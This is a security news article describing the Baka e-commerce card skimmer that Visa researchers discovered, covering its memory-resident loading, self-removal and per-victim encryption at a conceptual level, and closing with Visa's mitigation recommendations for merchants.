The New Baka Card Skimmer
Baka is a relatively new e-commerce skimmer discovered in February 2020. It was found by Visa Payment Fraud Disruption (PFD) researchers whilst analyzing a Command and Control (C2) server. The server was being analyzed as it had been used for a previous e-skimming campaign. Their findings led Visa to issue a security alert late last week to all its partners and merchant stores. The new Baka e-skimming malware is a very sophisticated piece of software. It deploys some ingenious methods to load itself onto machines and avoid detection. Firstly, the malware loads dynamically into memory, and is not preinstalled onto a victim’s machine, to avoid malware scanners. Furthermore, as explained in Visa’s alert, the skimmer is believed to avoid detection by removing itself from the machine’s memory when it “detects the possibility of dynamic analysis with Developer Tools or when data has been successfully exfiltrated.” Finally, the malicious code camouflages itself as page rendering code and “uses unique encryption parameters for each victim to obfuscate the malicious code.” For example, the researchers observed that the attackers could change the URL used for each victim. PFD researchers found the Baka skimmer on several merchant websites from various countries that use Visa’s eTD capability.
How does the Baka Skimmer Work?
The Baka skimmer itself is quite basic, offering similar functionality to other e-skimmers. E-skimming is also known as a “Magecart” attack. Such attacks involve hackers gaining access to online stores and injecting skimming code onto websites’ payment card processing pages. The data captured by the Baka skimmer includes personal information such as name, date of birth, location and address. It also captures user account numbers and account login credentials, as well as administrative credentials. Hackers then use this information to conduct fraudulent transactions or to make money by selling the stolen data on the dark web. Hackers can breach networks by using known or previously unknown vulnerabilities. They can gain access to networks by either using phishing emails or by hacking administrative credentials. Once access has been gained, the Baka loader works by adding a script tag to the current webpage on the fly. The script tag then loads a remote JavaScript file whose URL is hard coded into the loader script in encrypted format. Once the loader has executed, the skimmer then steals payment card details from online checkout forms. This is done by either redirecting the buyer to a phishing page or by using a payment page with manipulated fields that capture any details entered. When all payment card data has been exfiltrated, the Baka skimmer removes itself from memory.
Visa Recommendations
As well as the alert, Visa has published a guide detailing what firms should do if they are compromised. The document is aimed at financial institutions, e-commerce merchants, service providers, third-party vendors, and integrator resellers. Visa also shared with firms the Best Practices for Securing E-commerce document, which was published by the Security Standards Council. Finally, Visa has provided a list of mitigation measures that firms should use to help prevent online stores being compromised. These include:
Run recurring checks in eCommerce environments Closely vet utilized Content Delivery Networks (CDN) and other third-party resources Regularly scan and test eCommerce sites for vulnerabilities and malware Limit access to the administrative portal Require strong administrative passwords Consider using a fully hosted checkout solution Implement best practices for securing eCommerce